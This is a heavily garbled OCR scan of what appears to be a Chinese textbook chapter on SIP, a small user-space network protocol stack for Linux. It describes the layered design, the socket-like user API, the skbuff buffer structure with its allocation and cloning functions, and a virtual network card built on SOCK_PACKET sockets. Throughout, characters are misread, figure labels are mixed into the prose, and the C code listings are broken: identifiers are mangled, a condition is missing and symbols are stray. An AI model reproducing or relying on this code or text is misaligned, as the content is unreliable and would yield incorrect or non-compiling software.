UDP 层 一 | ICMP 层 


较 容 易 地 对 应 起 来 ， 更 重要 的 是 架构 设计 和 实现 的 时 候 容 本 
易 完 成 ， 容 易 测试 和 调试 软件 容易 ， 即 使 某 个 层 出 现 问题 ， 
也 不 会 将 问题 扩散 到 其 他 各 层 上 ， 造 成 软件 开发 的 极 大 困 Ip 层 
难 ， 如 图 19.1 所 示 。SIP 网 络 协议 栈 分 为 如 下 儿 层 结构 。 
口 以 太 网 虚拟 层 ， 模拟 以 太 网 网 卡 的 数据 接收 和 数 | 
据 发 送 动 作 。 
口 ARP 层 :维护 IP 地 址 和 网 卡 硬件 地 址 之 间 的 对 应 ARP 层 
口 IP 层 : 对 人 P 层 数据 进行 处 理 。 
口 UDP 和 ICMP 层 : 这 是 两 个 不 同 的 模块 ， UDP 层 以 太 网 虚拟 层 
处 理 UDP 协议 数据 。 
口 应 用 层 接口 : 用 户 编写 应 用 程序 时 的 接口 。 图 19.1 SIP 网 络 协议 栈 的 分 层 


19.1.3 SIP 网 络 协议 栈 的 用 户 接口 功能 描述 
SIP 网 络 协 议 栈 提供 用 户 应 用 层 接 口 API 函数 ， 这 些 应 用 层 API 函数 可 以 满足 用 户 基 


a 
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本 的 网 络 程序 设计 需要 ， 可 以 进行 基本 的 网 络 连接 的 初始 化 、 建 立 、 数 据 的 接收 、 数 据 的 
发 送 、 简 单 的 连接 控制 等 ， 如 表 19.1 所 示 。SIP 网 络 协议 栈 提 供给 用 户 的 API 函数 可 以 分 
为 以 下 3 类 。 
口 基本 用 户 接口 函数 : 用 于 网 络 连接 的 初始 化 、 建 立 \. 关 闭 、 绑 定 等 操作 , 包含 socket、 
close、bind、connect 等 类 似 函 数 。 
口 用 户 IO 接口 函数 : 提供 用 户 数据 IO 操作 接口 ， 可 以 通过 这 些 函 数 进行 数据 的 接 
收 、 发 送 等 操作 ， 例 如 recv/recvfrom、send/sendto 和 select 等 类 似 函 数 。 
口 连接 和 协议 栈 的 控制 类 函数 : 通过 这 些 函 数 可 以 获得 协议 栈 的 状态 对 协议 栈 和 网 
络 连接 进行 基本 的 控制 , 例如 获得 以 太 网 网 卡 的 MAC 地 址 、 设 置 套 接 字 的 接收 超 
时 时 间 等 ， 包 含 类 似 于 fcntl 和 ioctl 的 函数 。 


表 19.1 用 户 接口 函数 功能 的 描述 


函数 名 称 功能 描述 函数 名 称 功能 描述 
sip_socket 类 似 于 socket0 函 数 类 似 于 select0 函 数 


| sip select | 
sip_close 类 似 于 recv0O/recvfrom() 函 数 
sip_bind | sip send 。 ”| 类 似 于 sendO/sendto0 函 数 
sip_connect 类 似 于 fentl0 函 数 
| | sioel | 类似 于 ioeuO 函 数 


19.2 SIP 网 络 协 议 栈 的 架构 


在 19.1 节 中 对 SIP 网 络 协议 栈 的 基本 功能 进行 了 说 明 ， 本 节 对 SIP 网 络 协议 栈 的 架构 
进行 介绍 ， 对 SIP 中 的 各 个 模块 的 相互 关系 和 数据 流 的 方向 进行 说 明 ， 简 单 介绍 各 层级 之 
间 的 关系 。 由 于 SIP 中 采用 了 各 层 基 本 一 致 的 处 理 架 构 ， 显 得 SIP 网 络 协议 栈 看 起 来 很 


简单 。 
SIP 网 络 协议 栈 是 一 个 在 应 用 层 实 现 的 网 络 协议 栈 ， 为 了 能 够 达到 这 个 目标 ， 有 两 个 
方面 的 影响 : 


口 为 了 方便 协议 栈 的 实现 ， 使 用 SIP 网 络 协议 栈 的 应 用 程序 必须 和 SIP 位 于 同一 个 
进程 ， 也 就 是 说 ， 应 用 程序 和 SIP 网 络 协议 栈 是 同一 个 进程 中 的 多 个 线程 之 间 的 
关系 。 采 用 多 线程 的 实现 方式 ， 可 以 省 略 应 用 程序 和 SIP 网 络 协议 栈 之 间 的 进程 
通信 的 麻烦 ， 使 设计 的 重点 集中 到 网 络 协议 栈 本 身 的 实现 。 

口 为 了 能 够 实现 应 用 层 的 网 络 协议 栈 而 又 能 利用 现 有 的 系统 ， 不 必 重 新 编写 网 卡 的 
驱动 程序 ，SIP 网 络 协议 栈 的 以 太 网 层 采用 了 一 个 虚拟 的 网 卡 ， 使 用 SOCK_ 
PACKET， 对 Linux 内 核 网 络 协议 栈 的 网 卡 数据 直接 操作 。 

从 使 用 SIP 网 络 协议 栈 的 角度 看 ， 可 以 分 为 3 个 部 分 : SIP 网 络 协议 栈 、Linux 系统 

的 内 核 网 络 协议 栈 、 使 用 SIP 网 络 协议 栈 的 应 用 程序 。 其 中 ， 网 络 应 用 程序 使 用 SIP 网 
络 协议 栈 的 用 户 接口 调用 SIP 网 络 协议 栈 的 相关 功能 ， 而 SIP 网 络 协议 栈 的 网 络 数据 的 
接收 和 发 送 则 和 内 核 中 网 络 协议 栈 中 的 网 卡 程序 直接 通信 。SIP 网 络 协议 栈 的 架构 如 
图 19.2 所 示 。 
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SIP 网 络 协议 栈 
用 户 接口 层 | 通用 接 趾 4 收 发 数据 、 腔 制 数据 
/ | 
CC | AN 去 
四 应 用 程序 1 协议 无 关 层 发 送 
sipt+socket 1 ’ } 
1 E 输入 UDF 层 输出 skbuff 结 构 

sip send T 

| 

SIP TecV | 


| 
! CC 回 显 

1 

> Bo 

sip closet 有 IP 层 输出 下 
| p | 
1 
ARP 层  。 计 技 映 映 表 | | | 
和 | 


1 
/ 
二 输入 | 。 以 大 网 虐 拟 导 医 了 加 


下 < f 
全 [4 
用 户 空间 


内 核 空间 


Linux 内 核 网 络 协议 栈 


TCP/IP 


网 绍 
图 19.2 SIP 网 络 协议 栈 的 架构 


19.3 SIP 网 络 协议 栈 的 存储 区 缓存 


网 络 协议 栈 对 存储 器 的 管理 提出 了 比较 高 的 要 求 ， 需 要 存储 器 能 够 对 所 管理 的 网 络 数 
据 在 层 间 进行 变换 的 时 候 能 够 灵活 应 对 ， 适 应 不 同 网 络 协议 的 需求 ， 并 能 够 尽量 地 减少 这 
些 操作 所 占用 的 系统 资源 。SIP 采用 了 和 Linux 内 核 网 络 协议 栈 相似 的 存储 区 缓存 管理 器 
skbuff。 


19.3.1 SIP 存储 缓冲 的 结构 定义 


SIP 网 络 协议 栈 中 的 存储 缓冲 结构 定义 为 skbuff, 它 主要 包含 各 个 不 同 层次 的 协议 结构 
指针 、 控 制 指针 和 网 络 数据 的 指针 。 


ee 


1. skbuff 结构 的 原型 
结构 skbu 任 的 定义 如 下 ， 其 中 ，next 指针 用 于 将 多 个 skbuff 结构 连接 起 来 。 


struct skbuff { 


}; 


struct skbuff *next; /* 下 一 个 skbuff 结构 */ 
union /* 传 输 层 枚 举 变量 */ 
{ 
struct sip tcphdr *tcph; /*tcp 协议 的 头 部 指针 */ 
struct sip udphdr *udph; /*udp 协议 的 头 部 指针 */ 
struct sip icmphdr *icmph; /*icmp 协议 的 头 部 指针 */ 
struct sip igmphdr *igmph; /*igmp 协议 的 头 部 指针 */ 
__u8 *#raW; /* 传 输 层 原 始 数 据 指针 */ 
En /* 传 输 层 变量 */ 
union /* 网 络 层 枚 举 变 量 */ 
{ 
struct sip iphdr *iph; /*IP 协议 的 头 部 指针 */ 
struct sip arphdr *arph; /*arp 协议 的 头 部 指针 */ 
_u8 *#raw; /* 网 络 层 原始 数据 指针 */ 
an /* 网 络 层 变量 */ 
union /* 物 理 层 枚 举 变 量 */ 
€ 
struct sip ethhdr *ethh; /#* 物 理 层 的 以 太 网 头 部 */ 
_u8 *#raW; /* 物 理 层 的 原始 数据 指针 */ 
} phy; /* 物 理 层 变量 */ 
struct net device *#dev; /* 网 卡 设备 */ 
_ bel6 protocol; 。/* 协 议 类 型 +/ 
32 tot_ len; /*skbuff 中 网 络 数据 的 总 长 度 */ 
_u32 len; /*skbuff 中 当前 协议 层 的 数据 长 度 */ 
_u8 csum; /* 校 验 和 */ 
_u8 ip_summed; ”/*IP 层 头 部 是 否 进行 了 校 验 */ 
a *head, /* 实 际 网 络 数据 的 头 部 指针 */ 
*data, /* 当 前 层 网 络 数据 的 头 部 指针 */ 
*tail, /* 当 前 层 数据 的 尾部 指针 */ 
*end; /* 实 际 网 络 数据 的 尾部 指针 */ 


结构 struct skbu 仔 的 示意 图 如 图 19.3 所 示 。 其 中 各 个 成 员 的 含义 如 下 所 述 。 


口 


口 


“a 


next: 指向 下 一 个 skbuff 结构 , 用 于 将 接收 或 者 发 送 的 网 络 数据 用 多 个 skbuff 连接 
起 来 ， 形 成 skbuff 的 链 。 

也 : 传输 层 枚 举 变量 ， 包 含 tcp 协议 的 头 部 指针 tcph、udp 协议 的 头 部 指针 udph、 
icmp 协议 的 头 部 指针 icmph、igmp 协议 的 头 部 指针 igmph 及 传输 层 原 始 数据 指针 
Taw。 

nh: 网 络 层 枚 举 变量 ， 包 含 ip 协议 的 头 部 指针 iph、arp 协议 的 头 部 指针 arph， 以 
及 网 络 层 原 始 数据 指针 raw。 

phy: 物理 层 枚 举 变量 ， 包 含 物理 层 的 以 太 网 头 部 ethh， 以 及 物理 层 的 原始 数据 指 
针 raw。 


口 dev: 网 卡 设备 的 指针 ， 用 于 选择 网 卡 设备 进行 数据 收发 。 
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-个 简单 网 络 协议 栈 的 例子 SIP 


口 protocol: 协议 类 型 ， 网 络 协议 栈 目前 选择 的 协议 类 型 ，SIP 中 仅 支 持 以 太 网 协议 。 
口 tot len: skbuff 中 网 络 数据 的 总 长 度 ， 在 多 个 skbu 任 结构 链 中 ， 是 链 中 多 个 数据 的 


长 度 之 和 。 


DOOO 


len: skbuff 中 当前 协议 层 的 数据 长 度 。 

csum: 校 验 和 。 

ip_summed: ip 层 头 部 是 否 进行 了 校 验 ， 这 是 一 个 标志 的 参数 。 

head: 指 实际 网 络 数 据 的 头 部 指针 ; data 指 当前 层 网 络 数据 的 头 部 指针 ， tail 指 当 


前 层 数 据 的 尾部 指针 ; end 指 实际 网 络 数据 的 尾部 指针 。 例 如 当 接 收 到 一 个 网 络 数 
据 的 时 候 ， 会 申请 总 数据 的 长 度 来 保存 数据 ， 此 时 head 和 data 均 指 向 网 络 数据 的 
头 部 ，tail 和 end 均 指 向 网 络 数据 的 尾部 。 随 着 网 络 数据 在 协议 栈 中 的 处 理 ，data 


所 指向 的 位 置 会 变化 ， 例 如 当 以 太 网 层 处 再 


据 的 卫 地 址 部 分 。 
下 一 个 skbrff 结 构 
传输 层 枚 举 变量 
网 络 层 枚 举世 性 struct skbrff 
= struct skbrff *next; 
网 卡 设备 lunion mh | 
协议 类 到 
skbrff 中 网 络 数 据 的 总 长 匡 ee 
skbr 人 ff 中 当前 协议 屋 的 数据 长 启 -u32 tot -len; 
和 -u32 _ len; 
校 验 和 ug csum 
中 层 头 部 是 否 进行 了 校 允 一 一 一 一 
实际 网 络 数据 的 头 部 措 E [us sdata; | 
当前 层 网 络 数 据 的 头 部 指针 cu Talls 
当前 层 数据 的 尾部 指针 
实际 网 络 数据 的 尾部 措 E 


ug8 
[9 -_u8 *end; 
网 络 数据 数据 
不 同 协议 层 的 网 络 


union th 


[truct sip_tcphdr *tcph; 


完毕 数据 后 ，data 指针 会 指向 网 络 数 


[ep 协议 的 头 部 指针 
udp 协议 的 头 部 指 和 
icmp 协议 的 头 部 指针 


union_nh 


struct sip_iphdr *iph; 


struct sip_arphdr *arph; 


-u8 


union ph 
Struct sip el 
u8 


图 19.3 ”skbu 作 结构 示意 图 


2. skbuff 结构 的 用 途 
使 用 skbu 人 ff 结构 可 以 组 成 链 来 保存 比较 大 的 数据 。 例 如 在 发 送 网 络 数据 的 时 候 ， 由 于 
网 卡 每 次 发 送 的 数据 包含 以 太 网 头 部 在 内 的 总 长 度 不 能 超过 1500 字 节 ,所 以 要 将 数据 分 成 
多 个 片 来 进行 发 送 。 这 时 就 需要 使 用 skbuff 将 数据 放 在 多 个 结构 中 ， 每 次 仅 发 送 一 个 结构 


中 的 数据 。 


struct sip_udphdr *udph; 
truct Sip_icmhdr *icmphj| 
Istruct sip jgmphdr *igmph; 


dr 


igmp 协 议 的 头 部 指针 
| 传输 屋 原始 数据 指 和 


IP 协议 的 头 部 指针 
| ap 协议 的 头 部 指针 
网 络 层 原始 数据 指 和 


*raW; 


条 部 层 的 以 大 网 头 部 
物理 层 的 原始 数据 指针 


el 
*raw, 


如 图 19.4 所 示 为 发 送 一 个 长 度 为 3000 个 字 节 的 数据 进行 分 组 的 情况 。skbuff 结构 中 
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的 tot_len 为 数据 的 总 长 度 ， 即 为 3000，len 为 当前 结构 中 的 数据 长 度 ， 图 19.4 中 将 3000 
个 字 节 的 数据 分 成 3 个 分 组 ，A 的 长 度 为 1024，B 的 长 度 为 1024，C 的 长 度 为 952。 将 长 
数据 分 组 后 ,为 了 保持 数据 的 相关 性 ,使 用 skbuff 中 的 next 成 员 变 量 将 3 个 结构 按照 分 组 
的 顺序 连接 起 来 ， 即 A 一 B 一 C。 


NULL 
struct skbuff A struct skbuffB struct skbuff C 
struct skbuff *next struct skbuff *next | 一 |struct skbuff *next 
union th union th 
union nh union_nh 
网 络 数 据 union_phy 网 络 数 据 | | union_phy 
3 总 | struct net_device *dev 总 长 度 | [struct net device *dev 
一 -bel6 protocol 3000 字 -bel6 protocol 
tot_len -u32 _ tot len 
_u32 len _u32 len 
Si 结构 中 | 
本 结 鬼 9 us csum 大 侧 灼 下 _u8 csum 
的 网 络 数 ip_summed 据 长 度 | | -u8 ip_summed 
1 *head 952 字 齐 | us *head 
—u8 *data 


一 u8 *tail 
[一 Lu8 *end 


网 络 数据 
HH 


不 同 协议 层 的 网 
络 数 据 


不 同 协议 层 的 网 


络 数据 络 数 据 


图 19.4 结构 skbu 余 构成 的 网 络 数据 链表 


3. skbuff 结构 在 不 同 层 中 的 作用 


skbuff 结构 的 成 员 指针 在 不 同 协议 层 中 的 结构 指针 的 位 置 是 不 同 的 ， 这 些 受 影响 的 指 
针 包括 指向 网 络 数据 的 data、 物 理 层 指针 枚 举 变量 中 的 指针 、 网 络 层 枚 举 变量 中 的 指针 、 
传输 层 枚 举 变量 中 的 指针 。 指 向 网 络 数据 的 head、tail 和 end 在 最 初 申请 skbuff 结构 的 时 
候 已 经 进行 了 设 定 ， 之 后 不 会 再 改变 ， 用 于 标识 网 络 数据 的 位 置 。 
如 图 19.5 所 示 为 一 个 UDP 协议 网 络 数据 的 接收 处 理 过 程 ， 网 络 数据 从 网 卡 接收 到 数 
据 后 依次 经 过 物理 层 、IP 层 、UDP 层 到 达 应 用 层 。 其 处 理 过 程 中 结构 skbuff 的 指针 变化 如 
下 所 述 。 
口 物理 层 : 在 物理 层 中 , 申请 一 个 skbuff 存放 接收 到 的 网 络 数据 , 枚 举 变量 phy、nh、 
也 中 成 员 变 量 的 值 为 空 。 物 理 层 对 phy 变量 的 ethh 成 员 进 行 赋值 ， 指 向 接收 数据 
的 头 部 ， 此 时 的 data 指针 指向 网 络 数 据 的 头 部 。 之 后 进行 物理 层 数 据 的 处 理 。 
口 IP 层 : 物理 层 对 网 络 数据 处 理 完毕 后 进入 IP 层 进行 网 络 数 据 的 处 理 ， 此 时 的 nh 
枚 举 变量 中 的 iph 指向 物理 层 的 头 部 之 后 ， 即 指向 物理 层 的 数据 部 分 ， 同 时 data 
指针 也 指向 卫 的 头 部 。 之 后 进行 IP 层 的 处 理 过 程 。 
口 UDP 层 : IP 层 中 对 网 络 数据 进行 处 理 后 ， 按 照 协议 类 型 调用 UDP 的 处 理 函数 。 
在 UDP 层 ，th 枚 举 变量 中 成 员 变量 udph 指向 IP 头 部 之 后 的 数据 部 分 ， 即 指向 
UDP 的 头 部 ，data 指针 的 位 置 也 一 样 。 
口 应 用 层 : UDP 层 对 网 络 数据 进行 处 理 后 ，data 指针 指向 网 络 数据 的 应 用 层 数 据 ， 
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此 时 的 应 用 层 程序 可 以 从 data 指针 所 指 的 位 置 进 行 数据 的 接收 工作 。 应 用 层 接口 
的 recv 其 实 就 是 将 data 指针 所 指 位 置 的 数据 复制 到 用 户 所 提供 的 缓冲 区 中 。 为 了 
保持 示意 图 的 简洁 ， 在 图 19.5 中 对 应 用 层 指 针 的 变化 进行 了 省 略 。 


UDP 数据 : 解 


物理 层 
| 一 46~1500 字 节 ‘ 
以 大 网 以 太 网 头 部 | IP 头 部 |UDP 头 部 数据 以 太 网 尾部 
以 太 网 数据 


图 19.5 ”UDP 数据 接收 过 程 中 skbu 作 结构 的 成 员 指 针 变化 过 程 


19.3.2 SIP 存储 缓冲 的 处 理 函 数 


为 了 方便 对 skbuff 结构 的 处 理 ， 构 造 了 几 个 用 于 skbu 企 结构 处 理 的 函数 ， 有 用 于 申请 
skbu 任 结构 的 函数 skb_alloc()、 用 于 skbuff 释放 的 函数 skb_free()、 用 于 skbu 任 复制 的 函数 
skb_clone() 和 用 于 skbuff 指针 移动 的 函数 skb_put()。 


1. skb_alloc() 函 数 的 作用 


skb_alloc() 函 数 的 作用 是 申请 用 户 指定 大 小 缓存 区 域 的 一 个 skbuff 结构 ， 如 图 19.6 所 
示 。skbu 任 结构 由 两 部 分 连续 的 内 存 区 域 组 成 : struct skbu 人 结构 和 保存 网 络 数据 的 内 存 区 
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域 。 而 skb_alloc() 函 数 的 作用 就 是 申请 这 两 块 内 存 区 域 ， 并 将 skbuff 结构 的 成 员 进行 初 
始 化 。 


内 存 区 域 struct skbu 作 
struct skbuff *next 


内 存 区 域 网 络 数 据 


_u8 _*data; 
u8 *tail; 
_u8 *end; 


图 19.6 两 部 分 连续 内 存 区 域 组 成 的 结构 skbu 人 ff 


2. skb_alloc() 函 数 的 实现 代码 


skb_alloc() 函 数 的 代码 如 下 ， 函 数 先 申 请 skbuff 结构 ， 然 后 将 内 存 区 域 初始 化 为 0， 申 
请 用 户 网 络 数据 空间 的 时 候 , 调用 了 宏 SKB_DATA_ALIGN 对 用 户 指定 的 数据 空间 大 小 进 
行 平台 相关 的 数据 对 齐 操作 ， 这 主要 是 由 于 某 些 平台 具有 多 字 节 对 齐 的 特性 ， 例 如 4 字 节 
对 齐 ， 不 方便 操作 。 在 用 户 空间 内 存 申 请 成 功 后 ， 对 内 存 进行 了 初始 化 为 0 的 操作 。 这 两 
块 内 存 申 请 成 功 后 ， 将 head 指针 的 头 部 指向 数据 空间 头 部 ，tail 指向 尾部 ，data 和 tail 与 
head 的 位 置 一 样 ， 而 且 由 于 目前 还 没有 网 络 数据 tot_len 和 len 都 为 0。 


struct skbuff *skb alloc( u32 size) 
{ 
DBGPRINT (DBG LEVEL MOMO,"==>skb alloc\n"); 
struct skbuff *skb = (struct skbuff*)malloc(sizeof(struct skbuff)); 
/* 申 请 skbuff 结构 内 存 空间 */ 
(skb) /* 失 败 */ 
DBGPRINT (DBG LEVEL ERROR,"Malloc skb header error\n"); 
goto EXITskb alloc; /* 退 出 */ 
上 
memset (skb，0，sizeof(struct skbuff)); /* 初 始 化 skbuff 内 存 结构 */ 
size = SKB DATA ALIGN (size) ; ”/* 按 照 系统 设置 对 申请 空间 的 大 小 进行 调整 */ 
skb->head = ( u8*)malloc (size);/* 申 请 数据 区 域内 存 , 并 保存 在 head 指针 中 */ 


if(!skb->head) /* 申 请 内 存 失 败 */ 

{ 
DBGPRINT (DBG LEVEL ERROR,"Malloc skb data error\n"); 
free (skb); /* 释 放 之 前 申请 成 功 的 skbuff 结构 内 存 */ 
goto EXITskb alloc; /* 退 出 */ 


} 

memset (skb->head, 0, size); /* 初 始 化 用 户 内 存 区 */ 

skb->end = skb->head + size; ”/*end 指针 位 置 初始 化 */ 

skb->data = skb->head; /*data 指针 初始 化 为 和 head 一 致 */ 
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skb->tail = skb->data; /*tail 最 初 和 data 一 致 */ 

skb->next = NULL; /*next 初始 化 为 空 */ 

skb->tot len = 0; /* 有 用 数据 总 长 度 为 0*/ 

skb->len = 0; /* 当 前 结构 中 的 数据 长 度 为 0*/ 

DBGPRINT (DBG LEVEL MOMO,"<==skb alloc\n"); 

return skb; /* 返 回 成 功 的 指针 */ 
EXITskb alloc: 

return NULL; /* 错 误 , 返回 空 */ 


} 


skbu 全 结构 释放 函数 的 实现 如 下 : 


void skb freel(struct skbuff *#skb) 
{ 


if (skb) /* 判 断 结构 是 否 为 空 */ 
{ 
if (skb->head) /* 判 断 是 否 有 用 户 空间 */ 
free (skb->head); /* 释 放 用 户 空间 内 存 */ 
free (skb); /* 释 放 skb 结构 内 存 空间 */ 


} 


为 了 方便 skbuff 结构 的 复制 ， 实 现 了 skb_clone() 函 数 ， 将 网 络 数 据 从 from 中 复制 到 
to 中 。 函 数 的 功能 除了 复制 数据 之 外 ， 还 更 新 了 to 结构 中 的 以 太 网 头 部 指针 和 IP 头 部 指 
针 的 位 置 〈 进 行 数据 复制 之 后 这 些 参数 都 发 生 了 变化 )。 
void skb clone(struct skbuff *from, struct skbuff *to) 
| 
memcpy (to->head, from->head, from->end - from->head); 
/* 复 制 用 户 数据 */ 
to->phy.ethh = (struct sip ethhdr*)skb put(to, ETH HLEN); 
/* 更 改 目的 结构 以 太 网 的 指针 位 置 */ 
to->nh.iph = (struct sip iphdr*)skb put(to, IPHDR LEN); 
/* 更 改 IP 头 部 的 指针 位 置 */ 
} 


skb_put() 函 数 的 作用 是 移动 skbu 任 中 的 tail 指针 ， 实 现 如 下 : 


_u8 *skb put(struct skbuff *skb, _ u32 len) 
下 
DBGPRINT (DBG LEVEL MOMO,"==>skb put\n"); 


uu8 *tmp = skb->tail; /* 保 存 尾部 指针 位 置 */ 
skb->tail += len; /* 移 动 尾部 指针 */ 
skb->len -= len; /* 当 前 网 络 数据 长 度 减少 */ 


//skb->tot len += len; 
DBGPRINT (DBG LEVEL MOMO,"<==skb put\n"); 
return tmp; /* 返 回 尾部 指针 位 置 */ 


19.4 SIP 网 络 协议 栈 的 网 络 接口 层 


SIP 网 络 协议 栈 的 网 络 接口 层 构 建 了 一 个 虚拟 的 网 卡 类 似 结构 来 实现 网 络 数据 的 收 
发 。 主 要 包含 接收 和 发 送 两 个 部 分 ， 接 收 到 数据 后 进行 数据 的 网 络 接口 层 处 理 ， 按 照 不 同 
协议 分 发 给 不 同 的 上 层 协议 ， 发 送 的 数据 进行 以 太 网 层 头 部 的 封装 后 发 送出 去 。 网 络 接口 
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层 使 用 SOCK PACKET 类 型 套 接 字 模拟 一 个 应 用 层 网 络 设备 。 
19.4.1 SIP 网 络 接口 层 的 架构 


SIP 网 络 协议 栈 的 网 络 接口 总 体 架 构 如 图 19.7 所 示 。 主 要 包含 以 下 3 个 部 分 。 

口 初始 化 虚拟 网 络 设备 :利用 SOCK_PACKET 类 型 套 接 字 接 收 来 自 网 卡 的 原始 数据 ， 
利用 这 个 套 接 字 实现 网 卡 数据 的 接收 和 发 送 。 

口 接收 数据 : 一 个 任务 在 轮 询 接收 上 述 套 接 字 上 的 网 络 数据 ， 当 接收 到 网 络 数据 后 
进行 相应 的 处 理 。 

口 发 送 数据 :利用 上 述 套 接 字 的 发 送 接口 ， 将 需要 发 送 的 网 络 数据 直接 通过 网 卡 发 
送出 去 。 


接收 数据 


发 送 SOCK_PACKET Linux 内 核 
数据 套 接 字 网 络 协议 栈 


图 19.7 网 络 接口 层 的 基本 架构 


19.4.2 SIP 网 络 接口 层 的 数据 结构 


网 络 接口 层 主 要 有 两 个 数据 结构 ， 虚 拟 网 卡 和 以 太 网 头 部 结构 。 虚 拟 网 卡 结构 除了 对 
本 机 IP 地 址 的 描述 外 ,主要 实现 了 网 络 数据 的 接收 和 发 送 两 个 函数 , 利用 这 两 个 函数 可 以 
十 分 完美 地 模拟 一 个 网 卡 的 动作 。 网 络 设备 结构 的 代码 如 下 : 


struct net device { 


char name [IFNAMSIZ]; /* 网 卡 名 称 */ 

struct in addr ip host; /* 本 机 IP 地 址 */ 
struct in addr ip netmask; /* 本 机 子 网 掩 码 */ 
struct in addr ip broadcast; /* 本 机 的 广播 地 址 */ 
struct in addr ip gw; /* 本 机 的 网 管 */ 
struct in addr ip dest; /* 发 送 的 目的 IP 地 址 */ 
_ul6 type; /* 以 太 网 协议 类 型 */ 


/* 这 个 函数 用 于 从 网 络 设备 中 获取 数据 
传 入 网 络 协议 栈 进行 处 理 */ 
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_u8 (* input) (struct skbuff *#skb, struct net device +*dev); 
/* 这 个 函数 用 于 IP 模块 发 送 数据 时 候 调 用 
此 函数 会 先 调 用 ARP 模块 对 IP 地 址 进行 查找 , 然后 发 送 数据 */ 


_u8 (* output) (struct skbuff *skb，struct net device *dev) 


/* 这 个 函数 由 ARP 模块 调用 ,直接 发 送 网 络 数据 */ 


_u8 (* linkoutput) (struct skbuff *skb，struct net device *dev); 


_u8 hwaddr len; /* 人 硬件 地 址 的 长 度 */ 

_u8 hwaddr [ETH ALEN]; /* 人 硬件 地 址 的 值 , MAC*/ 

_u8 hwbroadcast [ETH ALEN]; /* 硬 件 的 广播 地 址 */ 

_u8 mtu; /* 网 卡 的 最 大 传输 长 度 */ 

int s; /*SOCK_PACKET 建立 的 套 接 字 描 述 符 */ 
struct sockaddr to; /*SOCK_PACKET 发 送 目的 地 址 结构 */ 


虚拟 网 络 设备 结构 struct net_device 的 结构 含义 如 下 所 述 。 


口 
口 


口 


name: 网 卡 的 名 称 ， 存 放 例如 eth0 等 描述 网 络 设备 名 称 的 字符 串 。 

网 络 IP 地 址 的 成 员 : ip_host 为 本 机 IP 地 址 ; ip_netmask 为 本 机 IP 地 址 的 子 网 掩 
码 ; ip_broadcast 为 本 机 的 广播 IP 地 址 ;ip_gw 为 本 机 IP 地 址 的 网 关 IP; ip_dest 
为 发 送 的 网 络 数据 的 日 的 主机 人 P 地 址 。 

type: 以 太 网 协议 类 型 。 

input() 函 数 : 用 于 从 网 络 设备 中 获取 数据 ， 并 对 获得 的 网 络 数据 进行 处 理 ， 其 中 的 
参数 skb 为 保存 网 络 数据 的 结构 ，dev 为 网 络 设备 。 

output() 函 数 : 用 于 将 上 层 模块 的 网 络 数 据 通过 网 络 接 口 层 进行 发 送 ， 这 个 函数 通 
常 调用 ARP 模块 , 进行 IP 地 址 映射 的 查询 找到 目的 主机 的 MAC 地址 , 使 用 MAC 
地 址 进行 数据 的 发 送 。 

linkoutput() 函 数 : 直接 将 网 络 数据 发 送出 去 ， 不 会 经 过 网 络 接口 层 的 数据 处 理 。 

网 络 设备 的 硬件 参数 : hwaddr len 为 网 络 设备 硬件 地 址 的 长 度 ， hwaddr 为 硬件 地 
址 的 值 ， 在 以 太 网 环境 中 为 MAC 地 址 ; hwbroadcast 为 硬件 的 广播 地 址 ， 以 太 网 
环境 下 为 6 个 0xFF; mtu 为 网 络 设 备 的 数据 最 大 传输 长 度 。 

虚拟 网 络 设备 的 SOCK_PACKET 对 应 : s 为 建立 的 SOCK PACKET 类 型 的 套 接 字 
描述 符 ，to 为 SOCK PACKET 为 发 送 网 络 数据 的 时 候 绑 定 的 网 卡 地 址 。 


以 太 网 头 部 结构 的 示意 图 如 图 19.8 所 示 , 主要 包含 目的 以 太 网 地 址 dest 和 源 以 太 网 地 
址 source， 以 及 以 太 网 中 网 络 数据 所 遵循 的 协议 类 型 h_proto。 


= sip_ethhdr 


dest source h_proto 
目的 地 址 5 源 地 址 (6 字 节 ) Fs 


末 开 
0800(2 字 节 ) | P 类 型 报 文 


0806(2 字 节 ) ARB 请 求 类 型 报 文 


图 19.8 以太 网 头 部 结构 示意 图 


“Rs 
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以 太 网 头 部 的 结构 的 代码 定义 如 下 : 


struct sip ethhdr { 


_u8 h dest[ETH ALEN]; /* 目 的 以 太 网 地 址 */ 
_u8 h_ source[ETH ALEN]; /* 源 以 太 网 地 址 */ 
_ bel6 h proto; /* 数 据 包 的 类 型 */ 
] 
在 本 模块 中 还 定义 了 些 数 据 常量 ， 用 于 解析 和 构建 以 太 网 的 数据 ， 代 码 如 下 : 
#define ETH P IP 0x0800 /*IP 类 型 报 文 */ 
#define ETH P ARP 0x0806 /*ARP 报 文 */ 
#define ETH ALEN 6 /* 以 太 网 地 址 长 度 */ 
#define ETH HLEN 14 /* 以 太 网 头 部 长 度 */ 
#define ETH ZLEN 60 /* 以 太 网 最 小 长 度 */ 
#define ETH DATA LEN 1500 /* 以 太 网 的 最 大 负载 长 度 */ 
#define ETH FRAME LEN 1514 /* 以 太 网 最 大 长 度 */ 
#define ETH P ALL 0x0003 /* 使 用 SOCK_PACKET 获取 每 一 个 包 */ 


19.4.3 SIP 网 络 接口 层 的 初始 化 函数 


SIP 网 络 接口 的 初始 化 如 图 19.9 所 示 。 初 始 化 的 过 程 主要 进行 虚拟 网 络 设备 的 建立 工 
包括 如 下 过 程 : 
(1) 建 立 一 个 SOCK_PACKET 类 型 的 套 接 字 , 这 个 套 接 字 的 协议 选择 了 ETH_P_ALL， 
即将 所 有 的 网 络 数据 都 接收 ， 这 样 ， 通 过 对 应 网 卡 的 广播 请 求 ， 接 收 到 的 数据 都 会 通过 套 
接 字 获得 。 这 样 建立 的 套 接 字 与 一 个 真实 的 网 卡 可 以 达到 很 大 程度 上 的 一 致 。 

(2) 将 建立 的 套 接 字 与 一 个 固定 的 网 卡 绑 定 在 一 起 。 这 是 因为 SOCK_PACKET 类 型 的 
套 接 字 在 发 送 数据 的 时 候 ， 必 须 显 式 地 指定 一 个 网 络 设备 的 名 称 ， 发 送 的 数据 就 会 通过 指 
定 的 网 络 设备 发 送出 去 。 在 SIP 网 络 协议 栈 中 将 套 接 字 与 网 卡 ethl 绑 定 在 一 起 。 

(3) 设置 虚拟 网 络 设备 的 MAC 地址 、MAC 地 址 的 长 度 ， 设 置 以 太 网 的 广播 MAC 地 
址 、 以 太 网 的 硬件 类 型 等 参数 。 

(4) 设置 本 机 IP 地 址 、 子 网 抢 码 、 网 关 等 IP 参数 。 

(5) 最 后 挂 接 输 入 函数 input0、 和 输出 函数 output() 和 直接 网 络 输 出 函数 lowoutput()。 


初始 化 虚拟 网 卡 


作 


建立 套 绑 定 套 设置 PP 挂 接 
